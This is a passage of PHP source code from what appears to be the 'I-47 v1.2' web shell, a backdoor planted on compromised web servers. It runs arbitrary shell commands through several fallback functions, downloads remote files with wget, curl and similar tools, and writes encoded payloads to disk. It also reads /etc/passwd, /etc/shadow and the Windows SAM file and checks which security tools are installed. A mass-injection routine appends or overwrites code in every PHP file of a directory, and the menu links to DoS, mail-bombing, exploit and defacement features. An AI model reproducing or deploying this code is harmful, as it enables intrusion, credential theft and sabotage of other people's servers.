  266. $dbserver = $_COOKIE["dbserver"];
  267. $dbuser = $_COOKIE["dbuser"];
  268. $dbpass = $_COOKIE["dbpass"];
  269. $dbname = $_GET['dbname'];
  270. echo "<div><font color=white size=3>[ $dbname ]</font> - <font color=white size=3>&gt;</font> <a href=$self?viewdb&dbname=$dbname> <font size=3>Database List</font> </a> &nbsp; <a href=$self?logoutdb> <font color=red size=3>[ Log Out ]</font> </a></div>";
  271. ?>
  272. <br><br>
  273. <form>
  274. <input type="hidden" name="action" value="createtable">
  275. <input type="hidden" name="dbname" value="<?php echo $_GET['dbname'];?>">
  276. <table>
  277. <tr>
  278. <td><input type="text" class="box" name="tablename"></td><td><input type="submit" value=" Create Table " name="createmydb" class="but"></td>
  279. </tr>
  280. </table>
  281.  
  282. <br>
  283. <form>
  284. <input type="hidden" value="<?php echo $_GET['dbname']; ?>" name="dbname">
  285. <input type="hidden" value="<?php echo $_GET['tablename']; ?>" name="tablename">
  286. <input type="hidden" value="executequery" name="action">
  287. <table>
  288. <tr>
  289. <td><textarea cols="60" rows="7" name="executemyquery" class="box">Execute Query..</textarea></td>
  290. </tr>
  291. <tr>
  292. <td><input type="submit" value="Execute" class="but"></td>
  293. </tr>
  294. </table>
  295. </form>
  296.  
  297. <?php
  298.  
  299. $mysqlHandle = mysql_connect ($dbserver, $dbuser, $dbpass);
  300.  
  301. mysql_select_db($dbname);
  302. $pTable = mysql_list_tables( $dbname );
  303.  
  304. if( $pTable == 0 ) {
  305. $msg = mysql_error();
  306. echo "<h3>Error : $msg</h3><p>\n";
  307. return;
  308. }
  309. $num = mysql_num_rows( $pTable );
  310.  
  311. echo "<table cellspacing=1 cellpadding=5 border=1 style=width:60%;>\n";
  312.  
  313. for( $i = 0; $i < $num; $i++ )
  314. {
  315. $tablename = mysql_tablename( $pTable, $i );
  316. $result = mysql_query("select * from $tablename");
  317. $num_rows = mysql_num_rows($result);
  318. echo "<tr>\n";
  319. echo "<td>\n";
  320. echo "<a href='$self?action=viewdata&dbname=$dbname&tablename=$tablename'><font color=red size=3>$tablename</font></a> ($num_rows)\n";
  321. echo "</td>\n";
  322. echo "<td>\n";
  323. echo "<a href='$self?action=viewSchema&dbname=$dbname&tablename=$tablename'>Schema</a>\n";
  324. echo "</td>\n";
  325. echo "<td>\n";
  326. echo "<a href='$self?action=viewdata&dbname=$dbname&tablename=$tablename'>Data</a>\n";
  327. echo "</td>\n";
  328. echo "<td>\n";
  329. echo "<a href='$self?action=empty&dbname=$dbname&tablename=$tablename'>Empty</a>\n";
  330. echo "</td>\n";
  331. echo "<td>\n";
  332. echo "<a href='$self?action=dropTable&dbname=$dbname&tablename=$tablename' onClick=\"return confirm('Drop Table \'$tablename\'?')\">Drop</a>\n";
  333. echo "</td>\n";
  334. echo "</tr>\n";
  335. }
  336.  
  337. echo "</table></form>";
  338. mysql_close($mysqlHandle);
  339. echo "<div><font color=white size=3>[ $dbname ]</font> - <font color=white size=3>&gt;</font> <a href=$self?viewdb&dbname=$dbname> <font size=3>Database List</font> </a> &nbsp; <a href=$self?logoutdb> <font color=red size=3>[ Log Out ]</font> </a></div>";
  340. }
  341.  
  342.  
  343. function paramexe($n, $v)
  344. {
  345. $v = trim($v);
  346. if($v)
  347. {
  348. echo '<span><font color=red size=3>' . $n . ': </font></span>';
  349. if(strpos($v, "\n") === false)
  350. echo '<font color=red size=2>' . $v . '</font><br>';
  351. else
  352. echo '<pre class=ml1><font color=lime size=3>' . $v . '</font></pre>';
  353. }
  354. }
  355.  
  356. $dir = getcwd();
  357.  
  358. if(isset($_GET['dir']))
  359. {
  360. $dir = $_GET['dir'];
  361. }
  362.  
  363.  
  364. function dis()
  365. {
  366. if(!ini_get('disable_functions'))
  367. {
  368. echo "None";
  369. }
  370. else
  371. {
  372. echo @ini_get('disable_functions');
  373. }
  374. }
  375.  
  376. function mycmdexec($cmd)
  377. {
  378. global $disablefunc;
  379. $result = "";
  380. if (!empty($cmd))
  381. {
  382. if (is_callable("exec") and !in_array("exec",$disablefunc)) {exec($cmd,$result); $result = join("\n",$result);}
  383. elseif (($result = "$cmd") !== FALSE) {}
  384. elseif (is_callable("system") and !in_array("system",$disablefunc)) {$v = @ob_get_contents(); @ob_clean(); system($cmd); $result = @ob_get_contents(); @ob_clean(); echo $v;}
  385. elseif (is_callable("passthru") and !in_array("passthru",$disablefunc)) {$v = @ob_get_contents(); @ob_clean(); passthru($cmd); $result = @ob_get_contents(); @ob_clean(); echo $v;}
  386. elseif (is_resource($fp = popen($cmd,"r")))
  387. {
  388. $result = "";
  389. while(!feof($fp)) {$result .= fread($fp,1024);}
  390. pclose($fp);
  391. }
  392. }
  393. return $result;
  394. }
  395.  
  396. function rrmdir($dir)
  397. {
  398. if (is_dir($dir)) // ensures that we actually have a directory
  399. {
  400. $objects = scandir($dir); // gets all files and folders inside
  401. foreach ($objects as $object)
  402. {
  403. if ($object != '.' && $object != '..')
  404. {
  405. if (is_dir($dir . '/' . $object))
  406. {
  407. // if we find a directory, do a recursive call
  408. rrmdir($dir . '/' . $object);
  409. }
  410. else
  411. {
  412. // if we find a file, simply delete it
  413. unlink($dir . '/' . $object);
  414. }
  415. }
  416. }
  417. // the original directory is now empty, so delete it
  418. rmdir($dir);
  419. }
  420. }
  421.  
  422. function godir($dir)
  423. {
  424. //echo $dir;
  425.  
  426. $zip = new ZipArchive();
  427. $filename= basename($dir) . '.zip';
  428. // open archive
  429. if ($zip->open($filename, ZIPARCHIVE::CREATE) !== TRUE)
  430. {
  431. die ("Could not open archive");
  432. }
  433. else
  434. echo "fdg";
  435. if (is_dir($dir)) // ensures that we actually have a directory
  436. {
  437. $objects = scandir($dir); // gets all files and folders inside
  438. foreach ($objects as $object)
  439. {
  440. if ($object != '.' && $object != '..')
  441. {
  442. if (is_dir($dir . '\\' . $object))
  443. {//echo $dir . '/' . $object;
  444. // if we find a directory, do a recursive call
  445. godir($dir . '\\' . $object);
  446. }
  447. else
  448. {
  449. // if we find a file, simply add it
  450. $zip->addFile($dir . '\\' . $object) or die ("ERROR: Could not add file: $key");
  451. }
  452. }
  453. }
  454. // the original directory is now empty, so delete it
  455. $zip->addFile($dir) or die ("ERROR: Could not add file: $key");
  456. }
  457. }
  458.  
  459.  
  460.  
  461. function which($pr)
  462. {
  463. $path = execmd("which $pr");
  464. if(!empty($path))
  465. return trim($path);
  466. else
  467. return trim($pr);
  468. }
  469.  
  470. function cf($f,$t)
  471. {
  472. $w=@fopen($f,"w") or @function_exists('file_put_contents');
  473. if($w)
  474. {
  475. @fwrite($w,gzinflate(base64_decode($t))) or @fputs($w,gzinflate(base64_decode($t))) or @file_put_contents($f,gzinflate(base64_decode($t)));
  476. @fclose($w);
  477. }
  478. }
  479.  
  480. function remotedownload($cmd,$url)
  481. {
  482. $namafile = basename($url);
  483. switch($cmd)
  484. {
  485. case 'wwget':
  486. execmd(which('wget')." ".$url." -O ".$namafile);
  487. break;
  488. case 'wlynx':
  489. execmd(which('lynx')." -source ".$url." > ".$namafile);
  490. break;
  491. case 'wfread' :
  492. execmd($wurl,$namafile);
  493. break;
  494. case 'wfetch' :
  495. execmd(which('fetch')." -o ".$namafile." -p ".$url);
  496. break;
  497. case 'wlinks' :
  498. execmd(which('links')." -source ".$url." > ".$namafile);
  499. break;
  500. case 'wget' :
  501. execmd(which('GET')." ".$url." > ".$namafile);
  502. break;
  503. case 'wcurl' :
  504. execmd(which('curl')." ".$url." -o ".$namafile);
  505. break;
  506. default:
  507. break;
  508. }
  509. return $namafile;
  510. }
  511.  
  512. function magicboom($text)
  513. {
  514. if (!get_magic_quotes_gpc())
  515. return $text;
  516. return stripslashes($text);
  517. }
  518.  
  519. function checkproxyhost()
  520. {
  521. $host = getenv("HTTP_HOST");
  522. $filename = '/tmp/.setan/xh';
  523. if (file_exists($filename))
  524. {
  525. $_POST['proxyhostmsg']="</br></br><center><font color=red size=3><b>Success!</b></font></br></br><a href=$host:6543>$host:6543</a></br></br><b>Note:</b> If '$host' have a good firewall or IDS installed on their server, it will probably catch this or stop it from ever opening a port and you won't be able to connect to this proxy.</br></br></center>";
  526. } else {
  527. $_POST['proxyhostmsg']="</br></br><center><font color=red size=4><b>Failed!</b></font></br></br><font color=red size=3>Note:</b> If for some reason we would not create and extract the need proxy files in '/tmp' this will make this fail.</font></br></br></center>";
  528. }
  529. }
  530.  
  531. ##################################
  532. function execmd($cmd,$d_functions="None")
  533. {
  534. if($d_functions=="None")
  535. {
  536. $ret=passthru($cmd);
  537. return $ret;
  538. }
  539. $funcs=array("shell_exec","exec","passthru","system","popen","proc_open");
  540. $d_functions=str_replace(" ","",$d_functions);
  541. $dis_funcs=explode(",",$d_functions);
  542. foreach($funcs as $safe)
  543. {
  544. if(!in_array($safe,$dis_funcs))
  545. {
  546. if($safe=="exec")
  547. {
  548. $ret=@exec($cmd);
  549. $ret=join("\n",$ret);
  550. return $ret;
  551. }
  552. elseif($safe=="system")
  553. {
  554. $ret=@system($cmd);
  555. return $ret;
  556. }
  557. elseif($safe=="passthru")
  558. {
  559. $ret=@passthru($cmd);
  560. return $ret;
  561. }
  562. elseif($safe=="shell_exec")
  563. {
  564. $ret=@shell_exec($cmd);
  565. return $ret;
  566. }
  567. elseif($safe=="popen")
  568. {
  569. $ret=@popen("$cmd",'r');
  570. if(is_resource($ret))
  571. {
  572. while(@!feof($ret))
  573. $read.=@fgets($ret);
  574. @pclose($ret);
  575. return $read;
  576. }
  577. return -1;
  578. }
  579. elseif($safe="proc_open")
  580. {
  581. $cmdpipe=array(
  582. 0=>array('pipe','r'),
  583. 1=>array('pipe','w')
  584. );
  585. $resource=@proc_open($cmd,$cmdpipe,$pipes);
  586. if(@is_resource($resource))
  587. {
  588. while(@!feof($pipes[1]))
  589. $ret.=@fgets($pipes[1]);
  590. @fclose($pipes[1]);
  591. @proc_close($resource);
  592. return $ret;
  593. }
  594. return -1;
  595. }
  596. }
  597. }
  598. return -1;
  599. }
  600.  
  601. function getDisabledFunctions()
  602. {
  603. if(!ini_get('disable_functions'))
  604. {
  605. return "None";
  606. }
  607. else
  608. {
  609. return @ini_get('disable_functions');
  610. }
  611. }
  612.  
  613. function getFilePermissions($file)
  614. {
  615.  
  616. $perms = fileperms($file);
  617.  
  618. if (($perms & 0xC000) == 0xC000) {
  619. // Socket
  620. $info = 's';
  621. } elseif (($perms & 0xA000) == 0xA000) {
  622. // Symbolic Link
  623. $info = 'l';
  624. } elseif (($perms & 0x8000) == 0x8000) {
  625. // Regular
  626. $info = '-';
  627. } elseif (($perms & 0x6000) == 0x6000) {
  628. // Block special
  629. $info = 'b';
  630. } elseif (($perms & 0x4000) == 0x4000) {
  631. // Directory
  632. $info = 'd';
  633. } elseif (($perms & 0x2000) == 0x2000) {
  634. // Character special
  635. $info = 'c';
  636. } elseif (($perms & 0x1000) == 0x1000) {
  637. // FIFO pipe
  638. $info = 'p';
  639. } else {
  640. // Unknown
  641. $info = 'u';
  642. }
  643.  
  644. // Owner
  645. $info .= (($perms & 0x0100) ? 'r' : '-');
  646. $info .= (($perms & 0x0080) ? 'w' : '-');
  647. $info .= (($perms & 0x0040) ?
  648. (($perms & 0x0800) ? 's' : 'x' ) :
  649. (($perms & 0x0800) ? 'S' : '-'));
  650.  
  651. // Group
  652. $info .= (($perms & 0x0020) ? 'r' : '-');
  653. $info .= (($perms & 0x0010) ? 'w' : '-');
  654. $info .= (($perms & 0x0008) ?
  655. (($perms & 0x0400) ? 's' : 'x' ) :
  656. (($perms & 0x0400) ? 'S' : '-'));
  657.  
  658. // World
  659. $info .= (($perms & 0x0004) ? 'r' : '-');
  660. $info .= (($perms & 0x0002) ? 'w' : '-');
  661. $info .= (($perms & 0x0001) ?
  662. (($perms & 0x0200) ? 't' : 'x' ) :
  663. (($perms & 0x0200) ? 'T' : '-'));
  664.  
  665. return $info;
  666.  
  667. }
  668.  
  669.  
  670. function yourip()
  671. {
  672. echo $_SERVER["REMOTE_ADDR"];
  673. }
  674. function odi()
  675. {
  676. $od = @ini_get("open_basedir");
  677. echo $od;
  678. }
  679. function phpver()
  680. {
  681. $pv=@phpversion();
  682. echo $pv;
  683. }
  684. function serverip()
  685. {
  686. echo getenv('SERVER_ADDR');
  687. }
  688. function serverport()
  689. {
  690. echo $_SERVER['SERVER_PORT'];
  691. }
  692. function cip()
  693. {
  694. echo $_SERVER["SERVER_NAME"];
  695. }
  696. function safe()
  697. {
  698. global $sm;
  699. return $sm?"ON :( :'( (Most of the Features will Not Work!)":"OFF";
  700. }
  701. function browse()
  702. {
  703. $brow= $_SERVER["HTTP_USER_AGENT"];
  704. print($brow);
  705. }
  706. function serveradmin()
  707. {
  708. echo $_SERVER['SERVER_ADMIN'];
  709. }
  710. function mysq()
  711. {
  712. echo function_exists('mysql_connect')?("<font color='red'>Enabled</font>"):("Disabled");
  713. }
  714. function systeminfo()
  715. {
  716. echo php_uname();
  717. }
  718. function curlinfo()
  719. {
  720. echo function_exists('curl_version')?("<font color='lime'>Enabled</font>"):("<font color='red'>Disabled</font>");
  721. }
  722. function oracleinfo()
  723. {
  724. echo function_exists('ocilogon')?("<font color='lime'>Enabled</font>"):("<font color='red'>Disabled</font>");
  725. }
  726. function mysqlinfo()
  727. {
  728. echo function_exists('mysql_connect')?("<font color='lime'>Enabled</font>"):("<font color='red'>Disabled</font>");
  729. }
  730. function mssqlinfo()
  731. {
  732. echo function_exists('mssql_connect')?("<font color='lime'>Enabled</font>"):("<font color='red'>Disabled</font>");
  733. }
  734. function postgresqlinfo()
  735. {
  736. echo function_exists('pg_connect')?("<font color='lime'>Enabled</font>"):("<font color='red'>Disabled</font>");
  737. }
  738. function softwareinfo()
  739. {
  740. echo getenv("SERVER_SOFTWARE");
  741. }
  742. function download()
  743. {
  744. $frd=$_GET['download'];
  745. $prd=explode("/",$frd);
  746. for($i=0;$i<sizeof($prd);$i++)
  747. {
  748. $nfd=$prd[$i];
  749. }
  750. @ob_clean();
  751. header("Content-type: application/octet-stream");
  752. header("Content-length: ".filesize($nfd));
  753. header("Content-disposition: attachment; filename=\"".$nfd."\";");
  754. readfile($nfd);
  755.  
  756. exit;
  757.  
  758. }
  759.  
  760. function HumanReadableFilesize($size)
  761. {
  762.  
  763. $mod = 1024;
  764.  
  765. $units = explode(' ','B KB MB GB TB PB');
  766. for ($i = 0; $size > $mod; $i++)
  767. {
  768. $size /= $mod;
  769. }
  770.  
  771. return round($size, 2) . ' ' . $units[$i];
  772. }
  773.  
  774. function showDrives()
  775. {
  776. global $self;
  777. foreach(range('A','Z') as $drive)
  778. {
  779. if(is_dir($drive.':\\'))
  780. {
  781. ?>
  782. <a class="dir" href='<?php echo $self ?>?dir=<?php echo $drive.":\\"; ?>'>
  783. <?php echo $drive.":\\" ?>
  784. </a>
  785. <?php
  786. }
  787. }
  788. }
  789. function diskSpace()
  790. {
  791. echo HumanReadableFilesize(disk_total_space("/"));
  792. }
  793. function freeSpace()
  794. {
  795. echo HumanReadableFilesize(disk_free_space("/"));
  796. }
  797.  
  798. function thiscmd($p)
  799. {
  800. $path = myexe('which ' . $p);
  801. if(!empty($path))
  802. return $path;
  803. return false;
  804. }
  805.  
  806. function split_dir()
  807. {
  808. $de=explode("/",getcwd());
  809. $del=$de[0];
  810. for($count=0;$count<sizeof($de);$count++)
  811. {
  812. $imp=$imp.$de[$count].'/';
  813.  
  814. echo "<a href=".$self."?open=".$imp.">".$de[$count]."</a> / ";
  815. }
  816.  
  817. }
  818.  
  819. function mysecinfo()
  820. {
  821.  
  822. function myparam($n, $v)
  823. {
  824. $v = trim($v);
  825. if($v)
  826. {
  827. echo '<span><font color =red size=3>' . $n . ': </font></span>';
  828. if(strpos($v, "\n") === false)
  829. echo '<font color =lime size=3>' . $v . '</font><br>';
  830. else
  831. echo '<pre class=ml1><font color =lime size=3>' . $v . '</font></pre>';
  832. }
  833. }
  834.  
  835. myparam('Server software', @getenv('SERVER_SOFTWARE'));
  836. if(function_exists('apache_get_modules'))
  837. myparam('Loaded Apache modules', implode(', ', apache_get_modules()));
  838. myparam('Open base dir', @ini_get('open_basedir'));
  839. myparam('Safe mode exec dir', @ini_get('safe_mode_exec_dir'));
  840. myparam('Safe mode include dir', @ini_get('safe_mode_include_dir'));
  841. $temp=array();
  842. if(function_exists('mysql_get_client_info'))
  843. $temp[] = "MySql (".mysql_get_client_info().")";
  844. if(function_exists('mssql_connect'))
  845. $temp[] = "MSSQL";
  846. if(function_exists('pg_connect'))
  847. $temp[] = "PostgreSQL";
  848. if(function_exists('oci_connect'))
  849. $temp[] = "Oracle";
  850. myparam('Supported databases', implode(', ', $temp));
  851. echo '<br>';
  852.  
  853. if($GLOBALS['os'] == 'Linux') {
  854. myparam('Readable /etc/passwd', @is_readable('/etc/passwd')?"yes <a href='$self?passwd'>[view]</a>":'no');
  855. myparam('Readable /etc/shadow', @is_readable('/etc/shadow')?"yes <a href='#' onclick='g(\"FilesTools\", \"/etc/\", \"shadow\")'>[view]</a>":'no');
  856. myparam('OS version', @file_get_contents('/proc/version'));
  857. myparam('Distr name', @file_get_contents('/etc/issue.net'));
  858. myparam('Where is Perl?', myexe('whereis perl'));
  859. myparam('Where is Python?', myexe('whereis python'));
  860. myparam('Where is gcc?', myexe('whereis gcc'));
  861. myparam('Where is apache?', myexe('whereis apache'));
  862. myparam('CPU?', myexe('cat /proc/cpuinfo'));
  863. myparam('RAM', myexe('free -m'));
  864. myparam('Mount options', myexe('cat /etc/fstab'));
  865. myparam('User Limits', myexe('ulimit -a'));
  866.  
  867.  
  868. if(!$GLOBALS['safe_mode']) {
  869. $userful = array('gcc','lcc','cc','ld','make','php','perl','python','ruby','tar','gzip','bzip','bzip2','nc','locate','suidperl');
  870. $danger = array('kav','nod32','bdcored','uvscan','sav','drwebd','clamd','rkhunter','chkrootkit','iptables','ipfw','tripwire','shieldcc','portsentry','snort','ossec','lidsadm','tcplodg','sxid','logcheck','logwatch','sysmask','zmbscap','sawmill','wormscan','ninja');
  871. $downloaders = array('wget','fetch','lynx','links','curl','get','lwp-mirror');
  872. echo '<br>';
  873. $temp=array();
  874. foreach ($userful as $item)
  875. if(thiscmd($item))
  876. $temp[] = $item;
  877. myparam('Userful', implode(', ',$temp));
  878. $temp=array();
  879. foreach ($danger as $item)
  880. if(thiscmd($item))
  881. $temp[] = $item;
  882. myparam('Danger', implode(', ',$temp));
  883. $temp=array();
  884. foreach ($downloaders as $item)
  885. if(thiscmd($item))
  886. $temp[] = $item;
  887. myparam('Downloaders', implode(', ',$temp));
  888. echo '<br/>';
  889. myparam('HDD space', myexe('df -h'));
  890. myparam('Hosts', @file_get_contents('/etc/hosts'));
  891.  
  892. }
  893. } else {
  894. echo "<font color=red size=3>Password File : </font><a href=".$_SERVER['PHP_SELF']."?download=" . $_SERVER["WINDIR"]."\\repair\sam><b><font color=lime size=3>Download password file</font></b></a><br>";
  895. echo "<font color=red size=3>Config Files : </font><a href=".$_SERVER['PHP_SELF']."?open=" . $_SERVER["WINDIR"]."\\system32\drivers\etc\hosts><b><font color=lime size=3>[ Hosts ]</font></b></a> &nbsp;<a href=".$_SERVER['PHP_SELF']."?open=" . $_SERVER["WINDIR"]."\\system32\drivers\etc\\networks><b><font color=lime size=3>[ Local Network Map ]</font></b></a> &nbsp;<a href=".$_SERVER['PHP_SELF']."?open=" . $_SERVER["WINDIR"]."\\system32\drivers\etc\lmhosts.sam><b><font color=lime size=3>[ lmhosts ]</font></b></a><br>";
  896. $base = (ini_get("open_basedir") or strtoupper(ini_get("open_basedir"))=="ON")?"ON":"OFF";
  897. echo "<font color=red size=3>Open Base Dir : </font><font color=lime size=3>" . $base . "</font><br>";
  898. myparam('OS Version',myexe('ver'));
  899. myparam('Account Settings',myexe('net accounts'));
  900. myparam('User Accounts',myexe('net user'));
  901. }
  902. echo '</div>';
  903. }
  904.  
  905.  
  906.  
  907. function myexe($in) {
  908. $out = '';
  909. if (function_exists('exec')) {
  910. @exec($in,$out);
  911. $out = @join("\n",$out);
  912. } elseif (function_exists('passthru')) {
  913. ob_start();
  914. @passthru($in);
  915. $out = ob_get_clean();
  916. } elseif (function_exists('system')) {
  917. ob_start();
  918. @system($in);
  919. $out = ob_get_clean();
  920. } elseif (function_exists('shell_exec')) {
  921. $out = shell_exec($in);
  922. } elseif (is_resource($f = @popen($in,"r"))) {
  923. $out = "";
  924. while(!@feof($f))
  925. $out .= fread($f,1024);
  926. pclose($f);
  927. }
  928. return $out;
  929. }
  930.  
  931. function exec_all($command)
  932. {
  933.  
  934. $output = '';
  935. if(function_exists('exec'))
  936. {
  937. exec($command,$output);
  938. $output = join("\n",$output);
  939. }
  940.  
  941. else if(function_exists('shell_exec'))
  942. {
  943. $output = shell_exec($command);
  944. }
  945.  
  946. else if(function_exists('popen'))
  947. {
  948. $handle = popen($command , "r"); // Open the command pipe for reading
  949. if(is_resource($handle))
  950. {
  951. if(function_exists('fread') && function_exists('feof'))
  952. {
  953. while(!feof($handle))
  954. {
  955. $output .= fread($handle, 512);
  956. }
  957. }
  958. else if(function_exists('fgets') && function_exists('feof'))
  959. {
  960. while(!feof($handle))
  961. {
  962. $output .= fgets($handle,512);
  963. }
  964. }
  965. }
  966. pclose($handle);
  967. }
  968.  
  969.  
  970. else if(function_exists('system'))
  971. {
  972. ob_start(); //start output buffering
  973. system($command);
  974. $output = ob_get_contents(); // Get the ouput
  975. ob_end_clean(); // Stop output buffering
  976. }
  977.  
  978. else if(function_exists('passthru'))
  979. {
  980. ob_start(); //start output buffering
  981. passthru($command);
  982. $output = ob_get_contents(); // Get the ouput
  983. ob_end_clean(); // Stop output buffering
  984. }
  985.  
  986. else if(function_exists('proc_open'))
  987. {
  988. $descriptorspec = array(
  989. 1 => array("pipe", "w"), // stdout is a pipe that the child will write to
  990. );
  991. $handle = proc_open($command ,$descriptorspec , $pipes); // This will return the output to an array 'pipes'
  992. if(is_resource($handle))
  993. {
  994. if(function_exists('fread') && function_exists('feof'))
  995. {
  996. while(!feof($pipes[1]))
  997. {
  998. $output .= fread($pipes[1], 512);
  999. }
  1000. }
  1001. else if(function_exists('fgets') && function_exists('feof'))
  1002. {
  1003. while(!feof($pipes[1]))
  1004. {
  1005. $output .= fgets($pipes[1],512);
  1006. }
  1007. }
  1008. }
  1009. pclose($handle);
  1010. }
  1011.  
  1012. return(htmlspecialchars($output));
  1013.  
  1014. }
  1015.  
  1016.  
  1017. ?>
  1018.  
  1019. <?php
  1020.  
  1021.  
  1022. $pinfo = "info";
  1023. if(isset($_GET["com"]))
  1024. {
  1025. phpinfo();
  1026. }
  1027. else
  1028. {
  1029. $basedir=(ini_get("open_basedir") or strtoupper(ini_get("open_basedir"))=="ON")?"<font color='lime'>ON</font>":"<font color='red'>OFF</font>";
  1030. $etc_passwd=@is_readable("/etc/passwd")?"Yes":"No";
  1031. ?>
  1032. <div align="center">
  1033. <a href="<?php $_SERVER['PHP_SELF'];?>"><font size="6" color="#FF0000" style="text-decoration:none;" face="Times New Roman, Times, serif">I-47 v1.2: By Arjun </font></a>
  1034.  
  1035. </div>
  1036. <hr>
  1037.  
  1038. <table cellpadding="0" style="width:100%;">
  1039. <tr>
  1040. <td colspan="3" style="width:85%;">System Info : <font class="txt"><?php systeminfo(); ?></font></td>
  1041. <td style="width:15%;"><a href="<?php $_SERVER['PHP_SELF'];?>?com=info" target="_blank"><font class="txt"><i>Software Info</i></font></a></td>
  1042. </tr>
  1043. <tr>
  1044. <td style="width:85%;" colspan="3">Software : <font class="txt"><?php softwareinfo(); ?></font></td>
  1045. <td style="width:15%;">Server Port : <font class="txt"><?php serverport(); ?></font></td>
  1046. </tr>
  1047.  
  1048. <?php if($os != 'Windows' || shell_exec("id") != null) { ?><tr>
  1049. <td style="width:75%;" colspan="3">Uid : <font class="txt"><?php echo shell_exec("id"); ?></font></td>
  1050. </tr><?php } ?>
  1051. <tr>
  1052. <td style="width:20%;">Disk Space : <font class="txt"><?php diskSpace(); ?></font></td>
  1053. <td style="width:20%;">Free Space : <font class="txt"><?php freeSpace(); ?></font></td>
  1054.  
  1055. <td style="width:20%;">Server IP : <font class="txt"><a href="http://whois.domaintools.com/<?php serverip(); ?>"><?php serverip(); ?></a></font></td>
  1056. <td style="width:15%;">Your IP : <font class="txt"><a href="http://whois.domaintools.com/<?php yourip(); ?>"><?php yourip(); ?></a></font></td>
  1057. </tr>
  1058.  
  1059. <tr>
  1060. <?php if($os == 'Windows'){ ?><td style="width:15%;">View Directories : <font class="txt"><?php echo showDrives();?></font></td><?php } ?>
  1061. <td style="width:20%;">Current Directory : <font color="#009900"><?php
  1062. $d = str_replace("\\",$directorysperator,$dir);
  1063. if (substr($d,-1) != $directorysperator) {$d .= $directorysperator;}
  1064. $d = str_replace("\\\\","\\",$d);
  1065. $dispd = htmlspecialchars($d);
  1066. $pd = $e = explode($directorysperator,substr($d,0,-1));
  1067. $i = 0;
  1068. foreach($pd as $b)
  1069. {
  1070. $t = '';
  1071. $j = 0;
  1072. foreach ($e as $r)
  1073. {
  1074. $t.= $r.$directorysperator;
  1075. if ($j == $i) {break;}
  1076. $j++;
  1077. }
  1078.  
  1079.  
  1080. $href='dir='.$t;
  1081.  
  1082. echo '<a href="'.$self."?$href\"><b><font class=\"txt\">".htmlspecialchars($b).$directorysperator.'</font></b></a>';
  1083. $i++;
  1084. }
  1085.  
  1086. ?></font></td>
  1087. <td style="width:20%;">Disable functions : <font class="txt"><?php echo getDisabledFunctions(); ?> </font></td>
  1088. <td>Safe Mode : <font class=txt><?php echo safe(); ?></font></td>
  1089.  
  1090. </tr>
  1091. </table>
  1092.  
  1093.  
  1094. <table border="3" width="100%;" cellpadding="2">
  1095. <tr>
  1096. <td style="border:none;"><a href="<?php echo $self;?>"><font color="#FF0000">Home</font></a></td><font color="#1B1B1B" size="0">
  1097. <td style="border:none;"><a href="<?php echo $self.'?symlinkserver'?>"><font color="#FF0000">Symlink</font></a></td>
  1098. <td style="border:none;"><a href="<?php echo $self.'?forum'?>"><font color="#FF0000">Forum</font></a></td>
  1099. <td style="border:none;"><a href="<?php echo $self.'?secinfo'?>"><font color="#FF0000">Sec. Info</font></a></td>
  1100. <td style="border:none;"><a href="<?php echo $self.'?injector'?>"><font color="#FF0000">Code Inject</font></a></td>
  1101. <td style="border:none;"><a href="<?php echo $self.'?bypass';?>"><font color="#FF0000">Bypassers</font></a></td>
  1102. <td style="border:none;"><a href="<?php echo $self.'?fuzz'?>"><font color="#FF0000">Server Fuzzer</font></a></td>
  1103. <td style="border:none;"><a href="<?php echo $self.'?zone'?>"><font color="#FF0000">Zone-h</font></a></td>
  1104. <td style="border:none;"><a href="<?php echo $self.'?phpproxy'?>"><font color="#FF0000">Proxy</font></a></td>
  1105. <td style="border:none;"><a href="<?php echo $self.'?dos';?>"><font color="#FF0000">DoS</font></a></td>
  1106. <td style="border:none;"><a href="<?php echo $self.'?mailbomb'?>"><font color="#FF0000">Mail</font></a></td>
  1107. <td style="border:none;"><a href="<?php echo $self.'?phpc';?>"><font color="#FF0000">PHP</font></a></td>
  1108. <td style="border:none;"><a href="<?php echo $self.'?exploit'?>"><font color="#FF0000">Exploit</font></a></td>
  1109. <td style="border:none;"><a href="<?php echo $self.'?connect'?>"><font color="#FF0000">Connect</font></a></td>
  1110. <td style="border:none;"><a href="<?php echo $self.'?database'?>"><font color="#FF0000">SQL</font></a></td>
  1111. <td style="border:none;"><a href="<?php echo $self.'?about'?>"><font color="#FF0000">About</font></a></td>
  1112. <td style="border:none;"><a href="<?php echo $self.'?selfkill'?>" onClick="if(confirm('Are You Sure You Want To Kill This Shell ?')){return true;}else{return false;}"><font color="#FF0000">SelfKill</font></a></td>
  1113. <td style="border:none;"><a href="<?php echo $self.'?logout'?>"><font color="#FF0000">LogOut</font></a></td>
  1114. </tr>
  1115. </table>
  1116.  
  1117.  
  1118. <table align="center" style="width:95%; background-color:#0C0C0C; -moz-border-radius:25px;"><br>
  1119. <tr>
  1120. <form method="GET" action="<?php echo $self; ?>">
  1121. <td style="width:35%;" align="right"> &nbsp;Present Working Directory : </td><td style="width:20%;"><input name="dir" class="box" style="width:300px;" value="<?php if($dir == null){echo getcwd();} else { echo $dir; } ?>"/></td>
  1122. <td><input type="submit" value=" Go " class="but" /></td><td align="right"><?php if($os == "Linux") { ?>
  1123. <a href="<?php echo $self.'?downloadit'; ?>"><font color="#FF0000">Download It</font></a><?php } ?></td>
  1124. </form>
  1125. </tr>
  1126. </table>
  1127.  
  1128. <?php
  1129.  
  1130. if(isset($_POST['pathtomass']) && $_POST['pathtomass'] != '' && isset($_POST['filetype']) && $_POST['filetype'] != '' && isset($_POST['mode']) && $_POST['mode'] != '' && isset($_POST['injectthis']) && $_POST['injectthis'] != '')
  1131. {
  1132. //$dir = $_GET['dir'];
  1133. $filetype = $_POST['filetype'];
  1134. //$message = $_GET['message'];
  1135.  
  1136. $mode = "a"; //default mode
  1137.  
  1138.  
  1139. // Modes Begin
  1140.  
  1141. if($_POST['mode'] == 'Apender')
  1142. {
  1143. $mode = "a";
  1144. }
  1145. if($_POST['mode'] == 'Overwriter')
  1146. {
  1147. $mode = "w";
  1148. }
  1149.  
  1150. if ($_POST['filetype'] == 'php')
  1151. {
  1152. if (is_dir($_POST['pathtomass']))
  1153. {
  1154. $lolinject = $_POST['injectthis'];
  1155. foreach (glob($_POST['pathtomass'] . $directorysperator . "*.php") as $injectj00)
  1156. {
  1157. $fp=fopen($injectj00,$mode);
  1158. if (fputs($fp,$lolinject)){
  1159. echo '<br><font color=lime size=3>'.$injectj00.' was injected<br></font>';
  1160. } else {
  1161. echo '<font color=red size=3>failed to inject '.$injectj00.'</font>';
  1162. }
  1163. }
  1164. } else
